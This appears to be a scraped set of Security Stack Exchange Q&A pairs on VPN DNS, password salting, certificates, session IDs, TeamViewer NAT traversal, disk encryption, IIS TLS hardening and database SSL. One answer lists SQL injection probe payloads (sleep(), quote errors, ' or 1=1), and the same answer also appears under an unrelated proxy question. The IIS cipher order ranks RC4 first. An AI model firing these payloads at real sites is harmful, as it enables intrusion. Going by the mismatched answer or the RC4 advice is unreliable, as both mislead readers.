13,900 | Will they be resolved by my VPN provider, or by my original ISP (if left on "automatic" settings)? Would I have to manually configure a dns server, to make sure my requests will not be resolved by my ISP (constituting a privacy risk)? | The requests will be passed to the IP that's configured. So if your DNS is still your ISP's DNS, then yes you will still be asking your ISP to resolve a domain name for you. | {
"source": [
"https://security.stackexchange.com/questions/13900",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
14,000 | Perhaps this is a trivial question, but how accessible are environment variables in Linux between different users? e.g. if Alice executes export FAVORITE_FOOD=`cat /home/alice/fav_food.txt` Can Eve tell what's Alice's favourite food? (Assuming both Alice and Eve are normal users, and Eve doesn't have read access to /home/alice/fav_food.txt ) | Let's trace the flow of the confidential data. In this analysis, it is understood that anything Alice can do, root can also do. Also an external observer “one level up” (e.g. with physical access to snoop on the disk bus, or in the hypervisor if the code is running in the virtual machine) might be able to access the data. First, the data is loaded from a file. Assuming that only Alice has read permission on the file and the file is not otherwise leaked, only Alice can call cat /home/alice/fav_food.txt successfully. The data is then in the memory of the cat process, where only that process can access it. The data is transmitted over a pipe from the cat command to the calling shell; only the two processes involved can see the data on the pipe. The data is then in the memory of the shell process, again private to that process. At some point, the data will end up in the shell's environment. Depending on the shell, this may happen when the export statement is executed, or only when the shell executes an external program. At this point, the data will be an argument of an execve system call. After that call, the data will be in the environment of the child process. The environment of a process is just as private as the rest of that process's memory (from mm->env_start to mm->env_end in the process's memory map). It's contiguous with the initial thread's stack . However, there is a special mechanism that allows other processes to view a copy of the environment: the environ file in the process's /proc directory ( /proc/$pid/environ ). This file is only readable by its owner , who is the user running the process (for a privileged process, that's the effective UID). (Note that the command line arguments in /proc/$pid/cmdline , on the other hand, are readable by all.) You can audit the kernel source to verify that this is the only way to leak the environment of a process. There is another potential source for leaking the environment: during the execve call . The execve system call does not directly leak the environment. However, there is a generic audit mechanism that can log the arguments of every system call, including execve . So if auditing is enabled, the environment can be sent through the audit mechanism and end up in a log file. On a decently configured system, only the administrator has access to the log file (on my default Debian installation, it's /var/log/audit/audit.log , only readable by root, and written to by the auditd daemon running as root). I lied above: I wrote that the memory of a process cannot be read by another process. This is in fact not true: like all unices, Linux implements the ptrace system call. This system call allows a process to inspect the memory and even execute code in the context of another process. It's what allows debuggers to exist. Only Alice can trace Alice's processes. Furthermore, if a process is privileged (setuid or setgid), only root can trace it. Conclusion: the environment of a process is only available to the user (euid) running the process . Note that I assume that there is no other process that might leak the data. There is no setuid root program on a normal Linux installation that might expose a process's environment. (On some older unices, ps was a setuid root program that parsed some kernel memory; some variants would happily display a process's environment to any and all. On Linux, ps is unprivileged and gets its data from /proc like everyone else.). (Note that this applies to reasonably current versions of Linux. A very long time ago, I think in the 1.x kernel days, the environment was world-readable.) | {
"source": [
"https://security.stackexchange.com/questions/14000",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7306/"
]
} |
14,025 | Storing the hash of users' passwords, e.g. in a database, is insecure since human passwords are vulnerable to dictionary attacks. Everyone suggests that this is mitigated via the use of salts, but the salt is considered non-sensitive and does not need to be protected. In the event that the attacker has the salt how has his dictionary attack become more difficult than before? Does not having access to the salt, effectively, remove its usefulness? | Salt doesn't protect you against a lone attacker who is only after one password. An attacker who just wants to break one password will calculate hash(salt + guess) instead of hash(guess) (if the password scheme is hash(salt+password) ). Salt helps if the attacker wants to break many passwords. This is usually the case. Sometimes the attacker is attacking a site and wants to break into an account on that site, any account. Without a salt, most of the attacker's work can be used for all accounts, so she can test each of her attempts against all accounts at once. With a correctly-chosen salt (i.e. if no two accounts have the same salt), the attacker has to start over for each hashed password. Furthermore, in a sense, all password cracking attempts are attempting to crack all accounts passwords at once. That's because hashes can be precomputed; all it takes is for someone to generate a table of hashes — or more efficiently, a rainbow table — and that initial work can be distributed to multiple attackers who can use it on any account database that uses the same password hashing algorithm. Again, salt makes these precomputations useless. A brute-force password attack can be summarized like this: Make any precomputation that the attacker deems useful, such as building a rainbow table (which is an efficient way to represent a table mapping hashes to common passwords). For every one of the n accounts that the attacker is interested in breaking in, and for every one of the p password guesses that the attacker includes in her dictionary, test whether hash(guess[i]) = hashed_password[j] . In a naive approach, the second step requires n × p hash computations to try all guesses against all accounts. However, if the first step already calculated all the possible hashes, then the second step requires no hash computation at all, just testing whether each hashed_password is in the precomputed database, so the attack requires just n table lookups (this can even be sped up, but we've already gone from n x p slow computations¹ down to n table lookups). If each password has a different salt, then in order to be helpful, the precomputation would have to include an entry for every possible salt value. If the salt is large enough, the precomputation is infeasible. If the precomputation doesn't take the salt into account, it won't be useful to speed up the second step, because any cryptographic hash function “mixes” its input: knowing the hash of UIOQWHHXpassword doesn't help compute the hash of NUIASZNApassword . Even to attack a single account, the attacker needs to perform p hash computations to try all guesses, already an improvement on the single table lookup that would be sufficient if the attacker has a precomputed dictionary. ¹ A password should not be stored as a hash such as SHA-1, but using a slower hash function such as bcrypt or scrypt or PBKDF2 . | {
"source": [
"https://security.stackexchange.com/questions/14025",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/2583/"
]
} |
14,043 | In X.509 architecture what are the uses of cross signing certificates from other hierarchy? Does it just expand trust? So from the answer I am assuming that if CA3 is cross signed by CA2 (from another hierarchy) and CA1 (a parent in its own hierarchy) whose private key is used to encrypt the authentication hash in the certificate of CA3? | It's about expanding trust, yes. If you trust both CA1 and CA2, and a cert is signed by both, you've got a very high level of trust because two seaparate entities that you trust have verified the cert. It has the added bonus of increasing the ease of verification of trust, such as situations where you've got clients that trust CA1 or CA2 (but not both). In such a case, you can cross-sign a cert to be trusted by both. This allows more clients to verify trust without having to distribute separate certs for different CAs. Another bonus is in situations where a CA's private key is leaked. Let's say CA1's key leaks and your cert is signed by CA1 and CA2. In the wake of the leak, CA1 issues a revokation for its public key and you can no longer trust anything issued by CA1. However, since your cert is cross-signed to CA2 as well, any client that trusts CA2 can still maintain a level of trust in your cert. | {
"source": [
"https://security.stackexchange.com/questions/14043",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9224/"
]
} |
14,068 | Isn't 128 bit security enough for most practical applications? | Why do people buy red sport cars ? They do not go faster than sport cars of any other colour... AES comes with three standard key sizes (128, 192 and 256 bits). Many people see this and think that if there are three distinct sizes instead of just one, then there must be some difference, and since the 256-bit version is a bit slower than the 128-bit version (by about 40%), it must be "more secure". So they go for "the most secure" and choose 256-bit keys. In reality, the AES has three distinct key sizes because it has been chosen as a US federal algorithm apt at being used in various areas under the control of the US federal government, and that includes US Army. US Army has a long-standing Tradition of using cryptography, and that Tradition crystallized into internal regulation with all the flexibility and subtlety that armies around the world constantly demonstrate (just listen to some "military music" and you'll understand what I mean). Unfortunately, this happend quite some time ago, before the invention of the computer, and at that time most encryption systems could be broken, and the more robust were also very hard and slow to use. So the fine military brains came up with the idea that there should be three "security levels", so that the most important secrets were encrypted with the heavy methods that they deserved, but the data of lower tactical value could be encrypted with more practical, if weaker, algorithms. These regulations thus called for three distinct levels. Their designers just assumed that the lower level were necessarily weak in some way, but weakness was not mandatory . So the NIST decided to formally follow the regulations (ask for three key sizes) but to also do the smart thing (the lowest level had to be unbreakable with foreseeable technology). 128 bits are quite sufficient for security (see this answer for details). Therefore AES accepts 256-bit keys because of bureaucratic lassitude: it was easier to demand something slightly nonsensical (a key size overkill) than to amend military regulations. Most people don't know or don't care about History, and they just go for big because they feel they deserve it. | {
"source": [
"https://security.stackexchange.com/questions/14068",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8729/"
]
} |
14,093 | I recently followed a discussion, where one person was stating that passing the session id as url parameter is insecure and that cookies should be used instead. The other person said the opposite and argued that Paypal, for example, is passing the session id as url parameter because of security reasons. Is passing the session id as url parameter really insecure? Why are cookies more secure?
What possibilities does an attacker have for both options (cookies and url parameter)? | Is passing the session id as url parameter really insecure? While it's not inherently insecure, it can be a problem unless the code is very well-designed. Let's say I visit my favorite forum. It logs me in and appends my session ID to the URL in every request. I find a particularly interesting topic, and copy & paste the URL into an instant message to my friend. Unless the application has taken steps to ensure that there's some form of validation on the session ID, the friend that clicked that link may inherit my session, and then would be able to do anything I can do, as me. By storing session identifiers in cookies, you completely eliminate the link sharing problem. There's a variation on this theme called session fixation , which involves an intentional sharing of a session identifier for malicious purposes. The linked Wikipedia article goes into depth about how this attack works and how it differs from unintentional sharing of the session identifier. Why are cookies more secure? Cookies can be more secure here, because they aren't something that normal users can copy & paste, or even view and modify. They're a much safer default. What possibilities does an attacker have for both options? Neither of these methods is secure from man-in-the-middle attacks over unencrypted communication. Browser addons, spyware and other client-side nasties can also spy on both methods of storing session identifiers. In both cases, server-side validation that the client that claims to own a session ID is best practice. What this validation is composed of is up for debate. Keep in mind that users behind corporate proxies may hop between IP addresses between requests, so locking a session to an IP address may accidentally alienate people. The session fixation article mentions a few other helpful alternatives. | {
"source": [
"https://security.stackexchange.com/questions/14093",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9294/"
]
} |
14,142 | What methods are available for testing SQL injection vulnerabilities? | There are a number of ways of testing an application for vulnerabilities such as SQL Injection. The tests break down into three different methodologies: Blind Injection : MySQL example: http://localhost/test.php?id=sleep(30) If this SQL statement is interpreted by the database then it will take 30 seconds for the page to load. Error Messages: http://localhost/test.php?id='" If error reporting is enabled and this request is vulnerable to sql injection then the following error will be produced: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '"' at line 5 Tautology Based Injection : http://localhost/test.php?username=' or 1=1 /*&password=1 In this case supplying a Tautology , or a statement that is always true provides a predictable result. In this case the predictable result would be logging in the attacker with the first user in the database, which is commonly the administrator. There are tools that automate the use of the methods above to detect SQL Injection in a web application. There are free and open source tools such as Wapiti and Skipfish that do this. Sitewatch provides a free service that is a lot better than these open source tools. I can say that because I am a developer for Sitewatch. | {
"source": [
"https://security.stackexchange.com/questions/14142",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9339/"
]
} |
14,147 | I was using a socks proxy to access websites blocked by my ISP, now it don't work any more in an strange way. Using the proxy is same as not using it! (i.e. I can access open sites but filtered sites are filtered even through proxy.) I want to know what can case this? And is there any way to make a secure tunnel other than ssh? | There are a number of ways of testing an application for vulnerabilities such as SQL Injection. The tests break down into three different methodologies: Blind Injection : MySQL example: http://localhost/test.php?id=sleep(30) If this SQL statement is interpreted by the database then it will take 30 seconds for the page to load. Error Messages: http://localhost/test.php?id='" If error reporting is enabled and this request is vulnerable to sql injection then the following error will be produced: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '"' at line 5 Tautology Based Injection : http://localhost/test.php?username=' or 1=1 /*&password=1 In this case supplying a Tautology , or a statement that is always true provides a predictable result. In this case the predictable result would be logging in the attacker with the first user in the database, which is commonly the administrator. There are tools that automate the use of the methods above to detect SQL Injection in a web application. There are free and open source tools such as Wapiti and Skipfish that do this. Sitewatch provides a free service that is a lot better than these open source tools. I can say that because I am a developer for Sitewatch. | {
"source": [
"https://security.stackexchange.com/questions/14147",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9343/"
]
} |
14,227 | How would I set up a multiboot system which supports full hard drive encryption and pre-boot authentication. I have a system with Ubuntu, Windows 7, Windows XP, and I would like to install Red Hat. I use grub 2 boot loader. What software would support this set up, for full drive encryption with pre-boot authentication? There is TrueCrypt for Windows pre-boot authentication, but will it play nice with grub 2? What other disk encryption software could I use for Linux side? | Before you read all this, remember that this technique is at least 5 years old -- it's probably much easier by now (see the other answers). (But it sure was fun to figure this all out.) I did this a few years ago with Fedora 10 and Windows Vista to demonstrate how all the intricacies fit together. It was a bit involved (mostly because Windows Vista doesn't "play well with others" and doesn't like being installed second), but in the end I found a method that suited me. Your case is more complex because you have 3 existing OS'es and you want to add another onto your drive. Because I've never attempted this on the magnitude of 4 operating systems, I'll leave most of it up to you (the actual re-partitioning and such) and will try to take the general security principles from my experience and apply them to your situation. Also note that in my case, I started from scratch on a drive I had erased. This was more an experiment than an expert exposé... so take a few things with a grain of "salt" (no pun intended) and don't hold me responsible. :) Remember, these are just my notes. You will have to adjust them for your situation. So here we go: Problems overcome by the method described here My notebook’s hard disk could only contain 4 primary partitions. Primary partitions are the only ones that OSes can be installed to (Windows, anyway). Primary partitions are the only partitions the system can boot from Each extended partition counts as a primary partition. 6 or 7 partitions may be needed. TrueCrypt can’t encrypt an entire drive that has multiple partitions, OSes, and various file systems when it only runs on one TrueCrypt doesn’t play well with Grub or any non-Windows boot loader. Windows likes to be installed first and only on a partition flagged as “bootable” (or, if no partitions are flagged “bootable” at all) Benefits in the end After the initial boot loader prompt, mounting various encrypted partitions could be automated with scripts. (<3 Truecrypt) Files can be shared between encrypted operating systems (with password). Each and every partition is encrypted, even swap file. How the boot loaders work together We install and use Windows’ default boot loader to the MBR. This is what the computer will boot to first. We install GRUB (Fedora’s boot loader), but not to the MBR. This will merely be available for us to boot to later. We install TrueCrypt which takes over the Windows boot loader. TrueCrypt’s boot loader goes into the MBR. On boot, the user will authenticate with TrueCrypt then be taken to the Windows boot loader where the option Vista or Linux (actually GRUB) becomes available. In the end, my boot process looked like this: Diagram of full-disk encrypted dual-boot process (yellow boxes are encrypted partitions; padlocks are another layer of security) Possible adjustments for your situation I didn't use Truecrypt on the Linux side except to mount the Windows partitions. I'm not sure how to mount native Linux-encrypted partitions from Windows, so my setup was rather one-way. You might consider using Truecrypt to encrypt at least your Linux /home directory and let native Linux encryption protect the /swap partition, for example. This might allow Truecrypt on the Windows side to mount your Linux files. Re-partition your hard drive in-place, or add another drive for Red Hat. The folks over at SuperUser probably know more about this. Figure out how you're going to partition your hard drive ahead of time... you don't need as many partitions as I used. Requirements A computer with at least one hard disk you are willing to wipe clean (Back up your data first, of course...) Installation discs of the OSes you wish to install Gparted LiveCD or LiveUSB TrueCrypt EasyBCD to modify the Windows boot loader (There's a free version...) Instructions Back up your data. You are going to wipe the hard disk totally clean and reformat it very soon. Reformat the entire drive. To do this, I use Gparted LiveCD. If you don’t want to use Gparted, Fedora 10’s installer comes with a partition editor. But, it’s a bit trickier. You’ll have to partially complete the Fedora setup in order to get to it, apply the changes to the disk, then exit setup because Fedora shouldn’t be installed first. (Windows Vista’s partition editor is NOT powerful enough. You cannot use it for this.) I strongly encourage the use of a Gparted LiveCD or LiveUSB. I thought about how to split up my drive and after a while, I came up with this: Partition layout for dual booting Fedora 10 and Windows Vista with TrueCrypt I wish I had sized them differently in hindsight, but you can do it however you want. Each padlock indicates an encrypted partition. The yellow padlocks with “TC” are encrypted with TrueCrypt in Windows. The blue ones are encrypted by Fedora. As you can see, each and every partition - except, of course, the /boot partition - is encrypted. Partitions labeled in red are for Windows. Black is for Linux. Okay, so this is a setup that works for me. Basically, you’ll want these things: A primary boot partition to put Grub (the boot loader Fedora can install for you) - I recommend about 50 to 100 megabytes. Do not flag this as “bootable” when partitioning - Windows will complain. An extended partition to hold all the “data” or “miscellaneous” partitions. This will hold your Fedora /home directory (basically the “My Documents” folder of Linux), Windows backup partition (optional), and your Linux swap file (highly recommended). The swap file should be at least as large as your RAM’s capacity. A primary partition for Windows Vista to be installed to. A primary partition for Fedora 10 to be installed to. Partition your drive as such and be sure to format with the appropriate file systems. You can use the table above as reference. Write down the sizes of your partitions (in order) and their filesystem. You'll need this during the OS installs. Start installing Windows Vista. You’ll be forced to do a custom installation. Choose the primary NTFS partition you reserved for the Windows install. Don’t forget to load hard disk drivers - especially on laptops. If your Windows install hangs around 70%, then you need to install the SATA drivers for your laptop. Once drivers are loaded and you select the right partition, install Windows. After Windows installs, boot into it normally and finish setup. Don’t spend too much time customizing things yet. Once it is running, shut down and insert the Fedora 10 DVD. Boot to that and install Fedora. However, take note of the following: Be sure you choose to do a custom layout for your partitioning. Fedora will want to wipe things and create its preferred partition layout by default. Don’t let it do this. Make sure you go straight to the part where you can view and modify your current partition information. Don’t format the NTFS partitions. Windows is on one of them. Be sure to set the mount point for the small partition (100 MB?) to be /boot. -Check “Format as” and select “ext3.” You cannot encrypt this partition. Set the mount point for the partition for your /home directory to… you guessed it: /home. Check “Format as ” and select “ext3″ then choose the “Encrypt” option. Set the mount point for the partition for your swap file as /swap. Linux will have to format it and you should, of course, select “Encrypt.” Set the mount point for the partition for your main Fedora install to be “/”. Check “Format as” and select “ext3″ then choose the “Encrypt” option. Before continuing, ensure that neither of the NTFS partitions have a check mark next to them. If they do, they will be formatted and you’ll have to start over. Continue. Fedora will warn you it will delete all the data on the modified partitions. That’s okay. You may have to set your passwords now as well. Go ahead and do that. Soon it will ask you about the boot loader. Tread carefully here. Do not write the GRUB boot loader to the MBR. When it says “Install the boot loader on/dev/sda1″ (the “sda1″ may be different) - keep the box checked but click “Change Device” and choose “first sector of boot partition” instead. After that step, you should be home free. Finish up the install and reboot the computer. It will boot straight into Windows. Once Windows loads, download and install EasyBCD. You’ll want it to easily modify the Windows boot loader. Add an entry to the boot loader: click “Add/Remove Entries” - choose the “Linux” tab, select “GRUB” from the dropdown, and name it something intelligent. Choose the partition that contains GRUB, not Fedora. Leave the checkbox unchecked. Add the entry then try rebooting. You should now be able to boot into either Fedora or Windows! Boot into Windows again and encrypt it, as follows: Install TrueCrypt and create a new volume. Choose “Encrypt the system partition or entire system drive.” From this point, you’ll have to choose the proper options. Read them carefully! I don’t remember the exact sequence, but you need to specify “Multi-boot” at some point. At the end it will ask whether Windows has its boot loader in the MBR or if a different boot loader is used (like GRUB). Remember: we're using the Windows’ boot loader (we want Truecrypt to "overtake" it). Once you’ve finished the volume creation wizard, you’ll be asked to “Test” the system. It will restart for you. It should boot into the TrueCrypt boot loader where you’ll type your password. After that, it should load the Windows boot loader where you can boot into either Linux or Windows. From here, finish encrypting the Windows system partition, then remember to encrypt any other NTFS partitions you made for Windows. When you’re done, try booting into Linux. It should go to the GRUB boot menu where you can select Fedora or change your mind and go back to Windows. As Fedora boots, you’ll be asked for your password as it mounts the encrypted partitions. Tl; dr (Too long; didn't read) It took me a few tries to get it right with two OSes, and employed the use of software like EasyBCD, Truecrypt, and Gparted, but I was successful in the end... for 2 OSes. Good luck with 4. The key is to plan effectively. Size and format your partitions properly, then install operating systems in the correct order. (Usually Windows goes first.) PS. Hm, For a simpler solution, though not quite what you asked for: have you considered running 3 of the 4 operating systems in virtual machines? You can encrypt the host machine, thus protecting the other 3 at the same time. (And if you're worried about losing the VHD files, remember you can fully encrypt the guest OSes, too.) | {
"source": [
"https://security.stackexchange.com/questions/14227",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5715/"
]
} |
14,280 | I am wondering how is it possible for Team Viewer to establish the remote desktop connection over the internet even if the user has not enabled the 3389 port ? I am searching over the internet but didn't find the satisfied answer to my question ? How does it even possible to establish RDP over the internet since it is only possible across the network ? Does Team Viewer use Reverse Connection technique ?
Is it possible to establish the RDP connection with someone who is outside the network ? | To elaborate on ewanm89's post, TeamViewer does use UDP pinholeing. UDP is a stateless protocol. This means packets are fired off at their target with no verification (at the protocol level) that they were received or even reached the destination. Firewalls are designed to look for UDP packets and record the source and destination as well as the timestamp. If they see an inbound packet that matches an outbound packet they will generally allow the packet through even without a specific rule being placed in the firewall's access list. This can be locked down on enterprise grade devices, but in general 90% of the firewalls out there will allow return traffic. In order to pin hole your machine (viewer) has a TCP connection back to the main TeamViewer server. The target machine (client) also has a TCP connection to the main TeamViewer Server. When you hit connect your machine tells the main server its intention. The main server then gives you the IP address of the client machine. Your machine then begins firing UDP packets at the client. The client is signaled that you intend to connect and is given your IP. The client also starts firing UDP packets at you. If the firewalls are "P2P-friendly" , this causes both firewalls (yours and the client's) to allow the traffic, thus "punching holes" in the firewall. Specifically, this requires the firewalls to not change the public port of an outbound packet merely because its destination has changed; the firewall must reuse the same public port as long as the source of the packet hasn't changed. If your firewalls don't behave in such a friendly manner, then this won't work. Many firewalls do behave this way, though. Of course TeamViewer adds some security by doing a pin/password check before the main server sends the IP info to both parties but you get the idea. | {
"source": [
"https://security.stackexchange.com/questions/14280",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/9417/"
]
} |
14,326 | As you can see on this post TeamMentor.net vulnerable to BEAST and SSL 2.0, now what? the app I'm currently development got flagged for SSL 2.0 and BEAST by SSL Labs. I'm using IIS 7.0 with the latest patches, and can't seem to find the answers to these questions: What is the risk impact of this vulnerability on a site like http://teammentor.net ? What are the exploit scenarios? Is there any mitigation (or not) by the use of IIS 7.0? How do I fix this in IIS 7.0? Can anything been done at the Application Layer? For reference here are a couple other security.stackexchange.com questions on this topic: Next Microsoft Patch Tuesday include BEAST SSL fix Should I ignore the BEAST SSL exploit and continue to prefer AES? What ciphers should I use in my web server after I configure my SSL certificate? | In IIS 7 (and 7.5), there are two things to do: Navigate to: Start > 'gpedit.msc' > Computer Configuration > Admin Templates > Network > SSL Configuration Settings > SSL Cipher Suite Order (in right pane, double click to open). There, copy and paste the following (entries are separated by a single comma, make sure there's no line wrapping): TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_RC4_128_MD5,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256_P521,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384_P521,TLS_RSA_WITH_AES_128_CBC_SHA256,TLS_RSA_WITH_AES_256_CBC_SHA256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P521,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P256,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P384,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256_P521,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P384,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384_P521,TLS_DHE_DSS_WITH_AES_128_CBC_SHA256,TLS_DHE_DSS_WITH_AES_256_CBC_SHA256,TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA,TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA_P256 Run the following PowerShell commands as administrator (copy-paste into Notepad, save as 'fix-beast-in-iis.ps1' and run with elevated privileges): #make TSL 1.2 protocol reg keys
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client"
# Enable TLS 1.2 for client and server SCHANNEL communications
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Server" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.2\Client" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
# Make and Enable TLS 1.1 for client and server SCHANNEL communications
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server"
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Server" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client" -name "Enabled" -value 1 -PropertyType "DWord"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.1\Client" -name "DisabledByDefault" -value 0 -PropertyType "DWord"
# Disable SSL 2.0 (PCI Compliance)
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server" -name Enabled -value 0 -PropertyType "DWord" Once you've run the script, you can run 'regedit' and make sure the keys in the script were actually created correctly. Then reboot for the change to take effect. WARNING: Notice I didn't turn off SSL 3.0- the reason for this is due to the fact that, like it or not, there are still people out there using Windows XP with IE 6/7. Without SSL 3.0 enabled, there would be no protocol for those people to fall back on. While you may still not get a perfect on a Qualys SSL Labs scan, the majority of holes should be closed by following the previous steps. If you want absolute PCI compliance, you can copy the lines from the Disable SSL 2.0 section of the Powershell script, paste them at the end of the script and change them to the following: # Disable SSL 3.0 (PCI Compliance)
md "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server"
new-itemproperty -path "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server" -name Enabled -value 0 -PropertyType "DWord" Then, when you run the script, you disable SSL 2.0, SSL 3.0 and enable TLS 1.1 and 1.2. | {
"source": [
"https://security.stackexchange.com/questions/14326",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7507/"
]
} |
14,330 | In a x509 digital certificate there is a "certificate fingerprint" section. It contains md5, sha1 and sha256. How are these obtained, and during the SSL connection, how are these values checked for? | The fingerprint, as displayed in the Fingerprints section when looking at a certificate with Firefox or the thumbprint in IE is the hash of the entire certificate in DER form. If your certificate is in PEM format, convert it to DER with OpenSSL: openssl x509 -in cert.crt -outform DER -out cert.cer Then, perform a SHA-1 hash on it (e.g. with sha1sum1 ): sha1sum cert.cer This should produce the same result as what you see in the browser. These values are not part of the certificate, rather they are computed from the certificate. One application of these fingerprints is to validate EV certificates. In this case, the SHA-1 fingerprint of the root EV CA certificate is hard-coded in the browser (note that (a) it's the fingerprint of the root cert and (b) it has to match exactly the trust anchors shipped with the version of the browser compiled with those values). Apart from this, these fingerprints are mostly used for identifying the certificates (for organising them). It's the actual public keys that are used for the verification of other certificates in the chain. The digest used for signing the certificate is actually not in the certificate (only the resulting signature). See certificate structure : Certificate ::= SEQUENCE {
tbsCertificate TBSCertificate,
signatureAlgorithm AlgorithmIdentifier,
signatureValue BIT STRING }
TBSCertificate ::= SEQUENCE {
version [0] EXPLICIT Version DEFAULT v1,
serialNumber CertificateSerialNumber,
signature AlgorithmIdentifier,
issuer Name,
validity Validity,
subject Name,
... In this case, the signature value is computed from the DER encoded tbsCertificate (i.e. its content). When the signature algorithm is SHA1 with RSA (for example), a SHA-1 digest is computed and then signed using the RSA private key of the issuer. This SHA-1 digest has nothing to do with the fingerprint has shown by openssl x509 -fingerprint or within the browser, since it's that of the tbsCertificate section only. There are also a couple of unrelated extensions that can make use of digests, of the public keys this time: the Subject Key Identifier and the Authority Key Identifier . These are optional (and within the TBS content of the certificate). | {
"source": [
"https://security.stackexchange.com/questions/14330",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8201/"
]
} |
14,334 | Let's say I have a web server I setup, and then a database server. However, they are communicating locally and are behind firewall. In my opinion, no SSL is needed here right? The only time to use SSL to encrypt the database connection would be between a web server that exists in a server that remotely communicates with a database server that is located somewhere else right? I've seen guidelines for security before that advocate securing with SSL the database connection but it was vague on when to use it. | It looks like the two previous answers to this question more or less strongly recommend to turn on SSL anyway, but I'd like to suggest a different reasoning angle (although I'm not recommending not to turn on SSL). The two key points in assessing whether you need SSL or not are (a) what SSL protects you against and (b) what the thread model is: enumerate the potential threats. SSL/TLS protects the transport of information between a client (in this case, your web server) and a server (in this case, your database server) from tampering and eavesdropping by anyone on the network in between (including able to get on those two machines). To assess whether SSL is useful, you need to assume that the attacker is in a position to perform the attack SSL is designed to protect you against. That is, the attacker would need to be in a position to sniff packets on the network or on either machines. If someone in a position to sniff packets from the database server, they're likely to have root/admin access to that server. Using SSL/TLS at that stage will make no difference. If someone is in a position to sniff packets on the network between the web server and the database server (excluding those machines), using SSL/TLS will prevent them from seeing/altering the application content. If you think there might be a chance this is possible, do turn on SSL . A way to mitigate this would be to use two network cards on the web server: one to the outside world and one to the inside LAN where the DB server is (with no other machines, or in a way that you could treat them all as a single bigger machine). This network forming the overall web-farm or cluster (however you want to call it) would be physically separated and only have one entry point from the outside: the web server itself (same principle for a reverse proxy head node). If someone is in a position to sniff packets on the head node (the web server) itself, they're likely to have root access there (processes run by non-root users on the machine, shouldn't be able to read packets that are not for them). In this case, you would have a big problem anyway. What I doubt here is whether enabling SSL actually protects you much in this scenario. Someone with root access on the web server will be able to read your application configuration, including DB passwords, and should be able to connect to the DB server legitimately, 